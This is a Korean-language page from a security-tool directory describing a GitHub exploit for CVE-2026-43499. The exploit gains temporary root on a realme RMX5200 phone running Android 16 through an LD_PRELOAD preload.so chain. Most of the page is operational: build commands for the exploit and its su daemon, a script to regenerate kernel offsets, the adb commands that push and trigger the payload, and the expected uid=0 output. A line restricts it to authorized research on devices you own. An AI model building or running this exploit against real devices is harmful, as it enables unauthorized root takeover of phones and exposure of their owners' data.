Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-43499-RMX5200 — Android 16 로컬 권한 상승 익스플로잇으로, realme RMX5200에서 LD_PRELOAD 기반 preload.so 체인을 사용하여 CVE-2026-43499를 통해 임시 루트 액세스를 달성합니다. | Kitploit
도구/GitHubGitHub/sorrow404null/cve-2026-43499-rmx5200
Android SecurityPrivilege EscalationExploit FrameworksExploitationShellcodePost-ExploitationMobile SecurityPayload DevelopmentBinary Exploitation

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
GitHubsorrow404null/cve-2026-43499-rmx5200

CVE-2026-43499-RMX5200

Android 16 로컬 권한 상승 익스플로잇으로, realme RMX5200에서 LD_PRELOAD 기반 preload.so 체인을 사용하여 CVE-2026-43499를 통해 임시 루트 액세스를 달성합니다.

저장소 보기
61221개월 전아직 검토되지 않음

realme RMX5200용 CVE-2026-43499

CVE-2026-43499 로컬 권한 상승 SO 대상:

항목값
기기realme RMX5200 / RE6030L1
Android16
커널6.12.23-android16-5-gb2a876903b49-ab14541642-4k
핑거프린트realme/RMX5200/RE6030L1:16/BP2A.250605.015/...:user/release-keys

사전 빌드된 바이너리: bin/preload.so

이 저장소는 SO 빌드 트리만 포함합니다 (소스 + 오프셋 + 사전 빌드). 브라우저 하네스, 펌웨어 덤프, 테스트 스캐폴딩은 없습니다.

공개된 IonStack / popsicle 스타일 체인을 기반으로 합니다. 오프셋은 이 기기의 boot.img + xbl_config.img에서 재생성되었습니다.


레이아웃

root@kitploit:~
.
├── bin/preload.so              # prebuilt aarch64 shared object (verified)
├── generate_target.py          # optional: regenerate target.h from boot+xbl
├── source/
│   ├── Makefile
│   └── src/
│       ├── target.h            # RMX5200 offsets
│       ├── main.c preload.c slide.c ...
│       └── kernelsnitch/
└── README.md

빌드

요구 사항:

  • Android NDK (r27+ 권장)
  • Python 3 + llvm-objdump (target.h를 재생성하는 경우에만)

make 사용

root@kitploit:~
# Linux NDK example
export NDK_ROOT=/path/to/android-ndk
make -C source clean preload

# Windows NDK example
make -C source clean preload \
  NDK_ROOT="/c/Users/YOU/AppData/Local/Android/Sdk/ndk/27.2.12479018" \
  NDK_TOOLCHAIN="/c/Users/YOU/AppData/Local/Android/Sdk/ndk/27.2.12479018/toolchains/llvm/prebuilt/windows-x86_64"

출력:

root@kitploit:~
source/build/bin/preload.so

make 없이 (clang 직접 사용)

root@kitploit:~
cd source
mkdir -p build/bin build/embed
CC="$NDK_TOOLCHAIN/bin/aarch64-linux-android35-clang"

$CC -O2 -Isrc -fPIE -pie -DTARGET_CONFIG_H=\"target.h\" \
  src/su_daemon.c -o build/embed/su_daemon_aarch64_pie

$CC -O2 -Isrc -fPIC -Wno-unused-parameter -Wno-sign-compare -Wno-unused-function \
  -DTARGET_CONFIG_H=\"target.h\" \
  src/main.c src/util.c src/slide.c src/fops.c src/pipe.c \
  src/preload.c src/su_blob.S \
  -shared -o build/bin/preload.so -pthread

오프셋 재생성 (선택 사항)

일치하는 펌웨어 이미지가 필요합니다 (여기에 포함되지 않음):

root@kitploit:~
python3 generate_target.py \
  --boot boot.img \
  --xbl-config xbl_config.img \
  --llvm-objdump llvm-objdump \
  -o source/src/target.h

실행

ADB LD_PRELOAD

root@kitploit:~
adb push bin/preload.so /data/local/tmp/preload.so
adb shell 'chmod 0644 /data/local/tmp/preload.so'
adb shell 'LD_PRELOAD=/data/local/tmp/preload.so /system/bin/true'
adb shell '/data/local/tmp/su -c id'

브라우저 체인 (외부)

Firefox-151 lonStack 스타일 호스트(예: Rootme 기기 항목)를 통해 이 preload.so를 로드합니다. 이 저장소에 포함되지 않습니다.

성공 표시:

root@kitploit:~
slide-kaslr-ok
direct credential result uid=0 ...
local su binary ready path=/data/local/tmp/su
direct-root-summary root=1 ...
root@kitploit:~
uid=0(root) gid=0(root) ... context=kernel

참고 사항

  • 일시적인 루트만 — 재부팅 후 사라집니다.
  • 성공 후 일부 앱은 재부팅까지 Framework 초기화에 실패할 수 있습니다 (관련 공개 대상과 동일한 부작용 범주).
  • 오프셋은 빌드별입니다. 다른 OTA 빌드는 새 target.h / 재빌드가 필요합니다.
  • 소유한 기기에 대한 승인된 보안 연구용입니다.

크레딧

  • 공개 연구 컨텍스트: IonStack / CVE-2026-43499 분석 보고서
  • 구현 계보: popsicle 스타일 preload.so 체인
  • 기기 적용: RMX5200 (RE6030L1)
도구 다운로드